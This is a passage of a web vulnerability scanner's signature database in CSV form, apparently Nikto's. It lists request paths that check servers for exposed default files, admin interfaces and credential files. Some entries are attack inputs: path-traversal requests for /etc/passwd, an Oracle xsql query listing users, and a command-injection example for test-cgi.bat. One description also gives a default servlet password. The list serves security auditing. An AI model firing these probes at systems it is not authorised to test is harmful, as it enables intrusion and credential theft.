"002664","3093","1","@CGIDIRScommandit.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002665","3093","1","@CGIDIRScounter-ord","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002666","3093","1","@CGIDIRScounterbanner","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002667","3093","1","@CGIDIRScounterbanner-ord","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002668","3093","1","@CGIDIRScounterfiglet-ord","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002669","3093","1","@CGIDIRScounterfiglet/nc/","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002670","3093","1","@CGIDIRSCSMailto.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002671","3093","1","@CGIDIRSCSMailto/CSMailto.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002672","3093","1","@CGIDIRScsNews.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002673","3093","1","@CGIDIRScsPassword.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002674","3093","1","@CGIDIRScsPassword/csPassword.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002675","3093","1","@CGIDIRScutecast/members/","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002676","3093","1","@CGIDIRSday5datanotifier.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002677","3093","1","@CGIDIRSdb2www/library/document.d2w/show","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002678","3093","1","@CGIDIRSdb_manager.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002679","3093","1","@CGIDIRSDCFORMS98.CGI","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002680","3093","1","@CGIDIRSdnewsweb","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002681","3093","1","@CGIDIRSdonothing","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002682","3093","1","@CGIDIRSezshopper2/loadpage.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002683","3093","1","@CGIDIRSezshopper3/loadpage.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002684","3093","1","@CGIDIRSif/admin/nph-build.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002685","3093","1","@CGIDIRSikonboard/help.cgi?","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002686","3093","1","@CGIDIRSimageFolio.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002687","3093","1","@CGIDIRSimagefolio/admin/admin.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002688","3093","1","@CGIDIRSjournal.cgi?folder=journal.cgi%00","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002689","3093","1","@CGIDIRSmagiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002690","3093","1","@CGIDIRSmajordomo.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002691","3093","1","@CGIDIRSmojo/mojo.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002692","3093","1","@CGIDIRSncommerce3/ExecMacro/macro.d2w/%0a%0a","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002693","3093","1","@CGIDIRSncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002694","3093","1","@CGIDIRSnon-existent.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002695","3093","1","@CGIDIRSnph-exploitscanget.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002696","3093","1","@CGIDIRSnph-maillist.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002697","3093","1","@CGIDIRSparse-file","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002698","3093","1","@CGIDIRSphp-cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002699","3093","1","@CGIDIRSpollssi.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002700","3093","1","@CGIDIRSpostcards.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002701","3093","1","@CGIDIRSprofile.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002702","3093","1","@CGIDIRSquikstore.cfg","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002703","3093","1","@CGIDIRSregister.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002704","3093","1","@CGIDIRSreplicator/webpage.cgi/","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002705","3093","1","@CGIDIRSrightfax/fuwww.dll/?","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002706","3093","1","@CGIDIRSrmp_query","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002707","3093","1","@CGIDIRSrobpoll.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002708","3093","1","@CGIDIRSscripts/*%0a.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002709","3093","1","@CGIDIRSsimplestguest.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002710","3093","1","@CGIDIRSsimplestmail.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002711","3093","1","@CGIDIRSstatusconfig.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002712","3093","1","@CGIDIRSsws/manager.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002713","3093","1","@CGIDIRStexis/phine","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002714","3093","1","@CGIDIRSUpload.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002715","3093","1","@CGIDIRSutm/admin","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002716","3093","1","@CGIDIRSutm/utm_stat","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002717","3093","1","/ows-bin/oaskill.exe?abcde.exe","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002718","3093","1","/ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002719","3093","1","@CGIDIRS/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002720","3093","1","@CGIDIRS/_vti_pvt/doctodep.btr","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002721","3093","1","@CGIDIRScfgwiz.exe","GET","200","","","","","cfgwiz.exe is a Norton Anti-Virus file and should not be available via the web site.","",""
"002722","3093","1","@CGIDIRSCgitest.exe","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002723","3093","1","@CGIDIRSmailform.exe","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002724","3093","1","@CGIDIRSms_proxy_auth_query/","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002725","3093","1","@CGIDIRSpost16.exe","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002726","3093","2","/oem_webstage/oem.conf","GET","DocumentRoot","","","","","Oracle reveals a portion of the Apache httpd.conf file.","",""
"002727","3093","2","/database/","GET","200","","","","","Databases? Really??","",""
"002728","3093","2","/demo/sql/index.jsp","GET","JSP SQL Samples","","","","","This default may allow connectivity to the Oracle databases.","",""
"002729","3093","23","@CGIDIRS.htaccess","GET","200","","","","","Contains authorization information","",""
"002730","3093","23","@CGIDIRS.htaccess.old","GET","200","","","","","Backup/Old copy of .htaccess - Contains authorization information","",""
"002731","3093","23","@CGIDIRS.htaccess.save","GET","200","","","","","Backup/Old copy of .htaccess - Contains authorization information","",""
"002732","3093","23","@CGIDIRS.htaccess~","GET","200","","","","","Backup/Old copy of .htaccess - Contains authorization information","",""
"002733","3093","23","@CGIDIRS.htpasswd","GET","200","","","","","Contains authorization information","",""
"002734","3093","23","@CGIDIRS.passwd","GET","200","","","","","Contains authorization information","",""
"002735","3093","3","/.wwwacl","GET","200","","","","","Contains authorization information","",""
"002736","3093","3","/.www_acl","GET","200","","","","","Contains authorization information","",""
"002737","3093","3","@CGIDIRS.wwwacl","GET","200","","","","","Contains authorization information","",""
"002738","3093","3","@CGIDIRS.www_acl","GET","200","","","","","Contains authorization information","",""
"002739","3093","3","/.htpasswd","GET","200","","","","","Contains authorization information","",""
"002740","3093","3","/.access","GET","200","","","","","Contains authorization information","",""
"002741","3093","3","/.addressbook","GET","200","","","","","PINE addressbook, may store sensitive e-mail address contact information and notes","",""
"002742","3093","3","/.bashrc","GET","200","","","","","User home dir was found with a shell rc file. This may reveal file and path information.","",""
"002743","3093","3","/.bash_history","GET","200","","","","","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.","",""
"002744","3093","3","/.forward","GET","200","","","","","User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to.","",""
"002745","3093","3","/.history","GET","200","","","","","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.","",""
"002746","3093","3","/.htaccess","GET","200","","","","","Contains authorization information","",""
"002747","3093","3","/.lynx_cookies","GET","200","","","","","User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites.","",""
"002748","3093","3","/.mysql_history","GET","200","","","","","Database SQL?","",""
"002749","3093","3","/.passwd","GET","200","","","","","Contains authorization information","",""
"002750","3093","3","/.pinerc","GET","200","","","","","User home dir found with a PINE rc file. May reveal system information, directories and more.","",""
"002751","3093","3","/.plan","GET","200","","","","","User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol ","",""
"002752","3093","3","/.proclog","GET","200","","","","","User home dir with a Procmail log file. May reveal user mail traffic, directories and more.","",""
"002753","3093","3","/.procmailrc","GET","200","","","","","User home dir with a Procmail rc file. May reveal subdirectories, mail contacts and more.","",""
"002754","3093","3","/.profile","GET","200","","","","","User home dir with a shell profile was found. May reveal directory information and system configuration.","",""
"002755","3093","3","/.rhosts","GET","200","","","","","A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web.","",""
"002756","3093","3","/.sh_history","GET","200","","","","","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.","",""
"002757","3093","3","/.ssh","GET","200","","","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","",""
"002758","3093","3","/.ssh/authorized_keys","GET","200","","","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","",""
"002759","3093","3","/.ssh/known_hosts","GET","200","","","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","",""
"002760","31","3","@CGIDIRSls","GET"," neither '\/","","","","","The CERN server lets attackers view the host's path. Should be upgraded to Apache, as CERN is not maintained.","",""
"002761","3133","7","////../../data/config/microsrv.cfg","GET","HostName","","","","","Xerox WorkCentre allows any file to be retrieved remotely.","",""
"002762","3133","7","////////../../../../../../etc/passwd","GET","root:","","","","","Xerox WorkCentre allows any file to be retrieved remotely.","",""
"002763","3233","b","/_vti_bin/shtml.exe/_vti_rpc","GET","200","","","","","FrontPage may be installed.","",""
"002764","3233","2","/doc/rt/overview-summary.html","GET","Packages","","","","","Oracle Business Components for Java 3.1 docs is running.","",""
"002765","3233","2","/docs/sdb/en/html/index.html","GET","Support Database","","","","","This may be a default SuSe Apache install. This is the support page.","",""
"002766","3233","2","/jservdocs/","GET","200","","","","","Default Apache JServ docs should be removed.","",""
"002767","3233","2","/test/jsp/buffer1.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002768","3233","2","/test/jsp/buffer2.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002769","3233","2","/test/jsp/buffer3.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002770","3233","2","/test/jsp/buffer4.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002771","3233","2","/test/jsp/declaration/IntegerOverflow.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002772","3233","2","/test/jsp/extends1.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002773","3233","2","/test/jsp/extends2.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002774","3233","2","/test/jsp/Language.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002775","3233","2","/test/jsp/pageAutoFlush.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002776","3233","2","/test/jsp/pageDouble.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002777","3233","2","/test/jsp/pageExtends.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002778","3233","2","/test/jsp/pageImport2.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002779","3233","2","/test/jsp/pageInfo.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002780","3233","2","/test/jsp/pageInvalid.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002781","3233","2","/test/jsp/pageIsErrorPage.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002782","3233","2","/test/jsp/pageIsThreadSafe.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002783","3233","2","/test/jsp/pageSession.jsp","GET","Internal Servlet","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002784","3233","2","/test/realPath.jsp","GET","WEBROOT","","","","","Apache Tomcat default file found which reveals the web root. The /test directory should be removed.","",""
"002785","3233","2","/tomcat-docs/index.html","GET","200","","","","","Default Apache Tomcat documentation found.","",""
"002786","3233","2","@CGIDIRStest-cgi.bat","GET","200","","","","","This is an Apache for Win default. If Apache is lower than 1.3.23, this can be exploited as in test-cgi.bat?|dir+c:+>..\htdocs\listing.txt, but may not allow data sent back to the browser.","",""
"002787","3233","2","/akopia/","GET","200","","","","","Akopia is installed.","",""
"002788","3233","2","/bc4j.html","GET","Business Components","","","","","Default Oracle page, may allow limited administration.","",""
"002789","3233","2","/dms0","GET","DMSDUMP","","","","","Default Oracle 9iAS allows access to Dynamic Monitoring Services","",""
"002790","3233","2","/jspdocs/","GET","OracleJSP","","","","","Default Oracle JSP documentation.","",""
"002791","3233","2","/mod_ose_docs","GET","Oracle Servlet Engine","","","","","Default Oracle documentation found.","",""
"002792","3233","2","/ojspdemos/basic/hellouser/hellouser.jsp","GET","200","License Exception","","","","Oracle 9i default JSP page found, may be vulnerable to XSS in any field.","",""
"002793","3233","2","/ojspdemos/basic/simple/usebean.jsp","GET","200","License Exception","","","","Oracle 9i default JSP page found, may be vulnerable to XSS in any field.","",""
"002794","3233","2","/ojspdemos/basic/simple/welcomeuser.jsp","GET","200","License Exception","","","","Oracle 9i default JSP page found, may be vulnerable to XSS in any field.","",""
"002795","3233","2","/oprocmgr-status","GET","Module Name","","","","","Oracle 9iAS default install allows access to the Java Process Manager.","",""
"002796","3233","2","/php/index.php","GET","200","","","","","Monkey Http Daemon default PHP file found.","",""
"002797","3233","2","/pls/portal30/admin_/","GET","Gateway Configuration Menu","","","","","Default Oracle 9iAS allows unrestricted access to the mod_plsql DAD admin interface.","",""
"002798","3233","2","/pls/simpledad/admin_/","GET","Gateway Configuration Menu","","","","","This default may allow limited administration of the Oracle server.","",""
"002799","3233","2","/pls/simpledad/admin_/gateway.htm?schema=sample","GET","Gateway Configuration Menu","","","","","This default may allow limited administration of the Oracle server.","",""
"002800","3233","2","/pls/simpledad/admin_/globalsettings.htm","GET","edit global gateway","","","","","Oracle admin script allows modification of database information.","",""
"002801","3233","2","/search/","GET","Sample Search Interface","","","","","Default iPlanet search is enabled.","",""
"002802","3233","2","/servlet/Counter","GET","200","Error Occurred","","","","JRun default servlet found. All default code should be removed from servers.","",""
"002803","3233","2","/servlet/DateServlet","GET","200","Error Occurred","","","","JRun default servlet found. All default code should be removed from servers.","",""
"002804","3233","2","/servlet/FingerServlet","GET","200","Error Occurred","","","","JRun default servlet found. All default code should be removed from servers.","",""
"002805","3233","2","/servlet/HelloWorldServlet","GET","200","Error Occurred","","","","JRun default servlet found. All default code should be removed from servers.","",""
"002806","3233","2","/servlet/IsItWorking","GET","Yes, It's working","","","","","Default Java (JServ) pages are present.","",""
"002807","3233","2","/servlet/SessionServlet","GET","200","Error Occurred","","","","JRun or Netware WebSphere default servlet found. All default code should be removed from servers.","",""
"002808","3233","2","/servlet/SimpleServlet","GET","200","Error Occurred","","","","JRun default servlet found (possibly Websphere). All default code should be removed from servers.","",""
"002809","3233","2","/servlet/SnoopServlet","GET","200","Error Occurred","","","","JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.","",""
"002810","3233","2","/xdk/","GET","Oracle XML Development","","","","","Default Oracle documentation found.","",""
"002811","3233","2","/xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS","GET","USERNAME","","","","","This allows attackers to perform queries to the Oracle database. This sample app should be removed.","",""
"002812","3233","2","/admcgi/contents.htm","GET","200","","","","","Default FrontPage CGI found.","",""
"002813","3233","2","/admcgi/scripts/Fpadmcgi.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002814","3233","2","/admisapi/fpadmin.htm","GET","200","","","","","Default FrontPage file found.","",""
"002815","3233","2","/bin/admin.pl","GET","200","","","","","Default FrontPage CGI found.","",""
"002816","3233","2","/bin/cfgwiz.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002817","3233","2","/bin/CGImail.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002818","3233","2","/bin/contents.htm","GET","200","","","","","Default FrontPage CGI found.","",""
"002819","3233","2","/bin/fpadmin.htm","GET","200","","","","","Default FrontPage CGI found.","",""
"002820","3233","2","/bin/fpremadm.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002821","3233","2","/bin/fpsrvadm.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002822","3233","2","/cgi-bin/admin.pl","GET","200","","","","","Default FrontPage CGI found.","",""
"002823","3233","2","/cgi-bin/cfgwiz.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002824","3233","2","/cgi-bin/CGImail.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002825","3233","2","/cgi-bin/contents.htm","GET","200","","","","","Default FrontPage CGI found.","",""
"002826","3233","2","/cgi-bin/fpadmin.htm","GET","200","","","","","Default FrontPage CGI found.","",""
"002827","3233","2","/cgi-bin/fpremadm.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002828","3233","2","/cgi-bin/fpsrvadm.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002829","3233","2","/scripts/admin.pl","GET","200","","","","","Default FrontPage CGI found.","",""
"002830","3233","2","/scripts/cfgwiz.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002831","3233","2","/scripts/CGImail.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002832","3233","2","/scripts/contents.htm","GET","200","","","","","Default FrontPage CGI found.","",""
"002833","3233","2","/scripts/fpadmin.htm","GET","200","","","","","Default FrontPage CGI found.","",""
"002834","3233","2","/scripts/fpcount.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002835","3233","2","/scripts/fpremadm.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002836","3233","2","/scripts/fpsrvadm.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002837","3233","2","/_private/","GET","200","","","cannot be displayed","","FrontPage directory found.","",""
"002838","3233","2","/_private/orders.htm","GET","200","","","cannot be displayed","","Default FrontPage file found.","",""
"002839","3233","2","/_private/orders.txt","GET","200","","","cannot be displayed","","Default FrontPage file found.","",""
"002840","3233","2","/_private/register.htm","GET","200","","","cannot be displayed","","Default FrontPage file found.","",""
"002841","3233","2","/_private/register.txt","GET","200","","","cannot be displayed","","Default FrontPage file found.","",""
"002842","3233","2","/_private/registrations.htm","GET","200","","cannot be displayed","","","Default FrontPage file found.","",""
"002843","3233","2","/_private/registrations.txt","GET","200","","","cannot be displayed","","Default FrontPage file found.","",""
"002844","3233","2","/_private/_vti_cnf/","GET","200","","","cannot be displayed","","FrontPage directory found.","",""
"002845","3233","2","/_vti_bin/","GET","200","","","","","FrontPage directory found.","",""
"002846","3233","2","/_vti_bin/admin.pl","GET","200","","","","","Default FrontPage CGI found.","",""
"002847","3233","2","/_vti_bin/cfgwiz.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002848","3233","2","/_vti_bin/CGImail.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002849","3233","2","/_vti_bin/contents.htm","GET","200","","","","","Default FrontPage CGI found.","",""
"002850","3233","2","/_vti_bin/fpadmin.htm","GET","200","","","","","Default FrontPage CGI found.","",""
"002851","3233","2","/_vti_bin/fpremadm.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002852","3233","2","/_vti_bin/fpsrvadm.exe","GET","200","","","","","Default FrontPage CGI found.","",""
"002853","3233","2","/_vti_bin/_vti_cnf/","GET","200","","","","","FrontPage directory found.","",""
"002854","3233","2","/_vti_cnf/_vti_cnf/","GET","200","","","","","FrontPage directory found.","",""
"002855","3233","2","/_vti_inf.html","GET","FPVersion=","","","","","FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).","",""
"002856","3233","2","/_vti_log/_vti_cnf/","GET","200","","","","","FrontPage directory found.","",""
"002857","3233","2","/_vti_pvt/administrators.pwd","GET","200","","","","","Default FrontPage file found, may be a password file.","",""
"002858","3233","2","/_vti_pvt/authors.pwd","GET","200","","","","","Default FrontPage file found, may be a password file.","",""
"002859","3233","2","/_vti_pvt/service.pwd","GET","200","","","","","Default FrontPage file found, may be a password file.","",""
"002860","3233","2","/_vti_pvt/users.pwd","GET","200","","","","","Default FrontPage file found, may be a password file.","",""
"002861","3233","2","/manual/servlets/scripts/servlet1/servform.htm","GET","invokes a servlet","","","","","iPlanet default servlet found. All default code should be removed.","",""
"002862","3233","2","/manual/servlets/scripts/shoes/shoeform.htm","GET","invokes a jsp","","","","","iPlanet default servlet found. All default code should be removed.","",""
"002863","3233","2","/examples/","GET","Servlet Samples","","","","","JEUS default servlet example pages present","",""
"002864","3233","2","/examples/context","GET","Context servlet","","","","","JEUS default servlet examples disclose server directory","",""
"002865","3233","2","/examples/forward1","GET","Forward1 servlet","","","","","JEUS default servlet example","",""
"002866","3233","2","/examples/forward2","GET","Forward2 servlet","","","","","JEUS default servlet example","",""
"002867","3233","2","/examples/header","GET","Header servlet","","","","","JEUS default servlet example","",""
"002868","3233","2","/examples/include1","GET","Include1 servlet","","","","","JEUS default servlet example","",""
"002869","3233","2","/examples/info","GET","Info servlet","","","","","JEUS default servlet example","",""
"002870","3233","2","/examples/jsp/index.html","GET","JSP Samples","","","","","Tomcat or JEUS default JSP pages present.","",""
"002871","3233","2","/help/contents.htm","GET","200","","","","","Default Netscape manual found. All default pages should be removed.","",""
"002872","3233","2","/help/home.html","GET","200","","","","","Default Netscape manual found. All default pages should be removed.","",""
"002873","3233","2","/manual/ag/esperfrm.htm","GET","200","","","","","Default Netscape manual found. All default pages should be removed.","",""
"002874","3233","2","/nethome/","GET","200","","","","","Netscape Enterprise Server default doc/manual directory. Reveals server path at bottom of page.","",""
"002875","3233","2","/com/novell/gwmonitor/help/en/default.htm","GET","200","","","","","Netware gateway monitor access documentation found. All default documentation should be removed from web servers.","",""
"002876","3233","2","/com/novell/webaccess/help/en/default.htm","GET","200","","","","","Netware web access documentation found. All default documentation should be removed from web servers.","",""
"002877","3233","2","/com/novell/webpublisher/help/en/default.htm","GET","200","","","","","Netware web publisher documentation found. All default documentation should be removed from web servers.","",""
"002878","3233","2","/servlet/AdminServlet","GET","200","","","","","Netware Web Search Server (adminservlet) found. All default code should be removed from web servers.","",""
"002879","3233","2","/servlet/gwmonitor","GET","200","","","","","Netware Gateway monitor found. All default code should be removed from web servers.","",""
"002880","3233","2","/servlet/PrintServlet","GET","200","","","","","Novell Netware default servlet found. All default code should be removed from the system.","",""
"002881","3233","2","/servlet/SearchServlet","GET","200","","","","","Novell Netware default servlet found. All default code should be removed from the system.","",""
"002882","3233","2","/servlet/ServletManager","GET","401","","","","","Netware Java Servlet Gateway found. Default user ID is servlet, default password is manager. All default code should be removed from Internet servers.","",""
"002883","3233","2","/servlet/sq1cdsn","GET","200","","","","","Novell Netware default servlet found. All default code should be removed from the system.","",""
"002884","3233","2","/servlet/sqlcdsn","GET","401","","","","","Netware SQL connector found. All default code should be removed from web servers.","",""
"002885","3233","2","/servlet/webacc","GET","200","","","","","Netware Enterprise and/or GroupWise web access found. All default code should be removed from Internet servers.","",""
"002886","3233","2","/servlet/webpub","GET","200","","","","","Netware Web Publisher found. All default code should be removed from web servers.","",""
"002887","3233","2","/WebSphereSamples","GET","200","","","","","Netware Webshere sample applications found. All default code should be removed from web servers.","",""
"002888","3233","2","@CGIDIRScgi-test.exe","GET","200","","","","","Default CGI found","",""
"002889","3233","2","/doc/domguide.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002890","3233","2","/doc/dspug.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002891","3233","2","/doc/help4.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002892","3233","2","/doc/helpadmin.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002893","3233","2","/doc/helplt4.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002894","3233","2","/doc/internet.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002895","3233","2","/doc/javapg.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002896","3233","2","/doc/lccon.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002897","3233","2","/doc/migrate.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002898","3233","2","/doc/npn_admn.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002899","3233","2","/doc/npn_rn.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002900","3233","2","/doc/readmec.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002901","3233","2","/doc/readmes.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002902","3233","2","/doc/smhelp.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002903","3233","2","/doc/srvinst.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002904","3233","2","/domguide.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002905","3233","2","/dspug.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002906","3233","2","/help/domguide.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002907","3233","2","/help/dspug.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002908","3233","2","/help/help4.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002909","3233","2","/help/helpadmin.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002910","3233","2","/help/helplt4.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002911","3233","2","/help/internet.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002912","3233","2","/help/javapg.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002913","3233","2","/help/lccon.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002914","3233","2","/help/migrate.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002915","3233","2","/help/npn_admn.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002916","3233","2","/help/npn_rn.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002917","3233","2","/help/readmec.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
